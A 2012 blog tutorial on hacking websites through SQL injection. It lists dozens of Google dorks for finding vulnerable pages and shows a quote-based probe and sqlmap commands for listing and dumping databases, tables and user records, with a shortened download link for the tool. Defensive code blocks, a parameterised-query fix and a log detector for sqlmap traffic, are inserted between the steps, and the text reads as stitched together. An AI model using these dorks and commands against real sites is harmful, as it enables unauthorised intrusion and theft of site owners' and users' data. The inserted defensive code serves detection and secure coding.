Saturday, January 21, 2012

How to Hack a Website Using SQL Injection

How to Hack a Website, Method #1
-------------------------------------------
Using SQLMap to Hack Vulnerable Databases

Hackers sometimes hack into databases to get information such as admin passwords, secret files, internal memos, leaked emails, and user information. Sites to hack can be found by typing these "dorks" into Google:

allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
allinurl:profile_view.php?id=
allinurl:category.php?id=
allinurl:publications.php?id=
allinurl:fellows.php?id=
allinurl:downloads_info.php?id=
allinurl:prod_info.php?id=
allinurl:shop.php?do=part&id=
allinurl:collectionitem.php?id=
allinurl:band_info.php?id=
allinurl:product.php?id=
allinurl:releases.php?id=
allinurl:ray.php?id=
allinurl:produit.php?id=
allinurl:pop.php?id=
allinurl:shopping.php?id=
allinurl:productdetail.php?id=
allinurl:post.php?id=
allinurl:viewshowdetail.php?id=
allinurl:clubpage.php?id=
allinurl:memberInfo.php?id=
allinurl:section.php?id=
allinurl:theme.php?id=
allinurl:page.php?id=
allinurl:shredder-categories.php?id=
allinurl:tradeCategory.php?id=
allinurl:product_ranges_view.php?ID=
allinurl:shop_category.php?id=
allinurl:transcript.php?id=
allinurl:channel_id=
allinurl:item_id=
allinurl:newsid=
allinurl:news-full.php?id=
allinurl:news_display.php?getid=
allinurl:index2.php?option=
allinurl:viewapp.php?id=
allinurl:galeri_info.php?l=
allinurl:iniziativa.php?in=
allinurl:curriculum.php?id=
allinurl:labels.php?id=
allinurl:story.php?id=
allinurl:look.php?ID=

Click on one of the links that show up and look at the URL. You should see something like

id=5. 

Add a ' to the end of that, so it should look like
id=5'

Then hit Enter. If the page returns some sort of error, the page is vulnerable. Now, let's hack it!
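
Why the stray quote produces an error, and what removes it, as an added example (not code from this post or from any real site). The handler names, the articles table and its rows are constructed, and Python's sqlite3 stands in for the site's PHP and database.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for a site's article table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(5, "Release notes"), (6, "Internal memo")])
    return db

def get_article_vulnerable(db, raw_id):
    # The id= value is pasted into the SQL text, so a stray quote becomes
    # part of the statement and the database rejects it with a syntax error.
    sql = "SELECT title FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchone()

def get_article_hardened(db, raw_id):
    # 1) Validate: the parameter must be a short, plain decimal integer.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return None  # caller answers 400/404, never a database error page
    # 2) Bind: the value is sent separately from the SQL text, so it can
    #    never be parsed as SQL.
    return db.execute("SELECT title FROM articles WHERE id = ?",
                      (int(raw_id),)).fetchone()

def probe(handler, raw_id):
    """Return ('ok', row), or ('db_error', message) if the SQL failed."""
    db = make_db()
    try:
        return ("ok", handler(db, raw_id))
    except sqlite3.Error as exc:
        return ("db_error", str(exc))

if __name__ == "__main__":
    for handler in (get_article_vulnerable, get_article_hardened):
        for raw_id in ("5", "5'"):
            print(handler.__name__, repr(raw_id), probe(handler, raw_id))
```

The error page is the signal the test above relies on, so the fix is both the bound parameter and not showing database errors to the client.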

How to hack it:

1) Download the .zip from http://adf.ly/4v7L6
2) Extract it to your desktop
3) Open your terminal, cmd, or equivalent
4) Run, "cd Desktop"
5) Run, "cd sqlmap"
6) Obtain written consent from the owner. Don't do anything illegal.
7) Copy the link that we ran earlier and remove the ' mark
8) To get their databases, run:
 "./sqlmap -u [PASTE the link we copied on step 7] --dbs"
9) Now you have a list of their databases. Don't mess around with "information_schema"; it doesn't have anything we need/want
10) A list appears with all of the databases. Choose the database. If you want to end up hacking this site, you should choose a database that sounds like it may contain admin info. If you're just exploring their database, select what sounds the most interesting. Now that we have a database picked out, let's find all the tables in it. Use this:
"./sqlmap -u [DATABASE YOU'RE EXPLORING] --tables"
11) A list of the tables in that database should appear. Now, like before, find the table that sounds the most interesting and run this command:
"./sqlmap -u [TABLES YOU'RE EXPLORING] --columns"
12) Now, having seen the tables, you can dump the contents of that table by running:
"./sqlmap -u [TABLES YOU WANT TO DUMP] -U test --dump"
Depending on the size of the database, getting the contents could take anywhere from an instant to a few hours. Most things take less than a minute, but if you're dumping the info of thousands to millions of users, it could take all night. I normally just leave my computer running and set my alarm to wake me up really early.
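
What the steps above look like from the server side, as an added example (not part of the original post): a small access-log check that flags a quote sent in a URL parameter and a User-Agent naming sqlmap. The log lines are constructed samples in combined log format, and the reason labels are made up for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jan/2012:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Jan/2012:10:02:13 +0000] "GET /news.php?id=5%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Jan/2012:10:05:44 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120 "-" "sqlmap/1.0 (constructed sample)"',
]

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def classify(line):
    """Return (client_ip, [reasons]) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    # The User-Agent is client-controlled, so treat it as a cheap hint only.
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap-user-agent")
    # parse_qsl URL-decodes values, so %27 and a literal ' both match.
    for name, value in parse_qsl(urlsplit(m["target"]).query,
                                 keep_blank_values=True):
        if "'" in value:
            reasons.append(f"quote-in-param:{name}")
            # A 5xx answer means the quote reached the SQL parser.
            if m["status"].startswith("5"):
                reasons.append("server-error-on-quote")
    return (m["ip"], reasons) if reasons else None

def suspicious_sources(lines):
    """Group reasons by client IP so one source's activity reads as one row."""
    found = {}
    for line in lines:
        hit = classify(line)
        if hit:
            found.setdefault(hit[0], set()).update(hit[1])
    return {ip: sorted(reasons) for ip, reasons in found.items()}

if __name__ == "__main__":
    print(suspicious_sources(SAMPLE_LOG))
```

A quote in a free-text parameter (a surname, a search phrase) is normal, so this check is most useful on parameters that should only ever hold a number.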
I hope you enjoyed this tutorial. I run this site as my only source of income, and we are completely ad supported. Thanks for anything you can do to help, from looking at an ad if you're interested to donating!
Hack the Planet,
The Author 



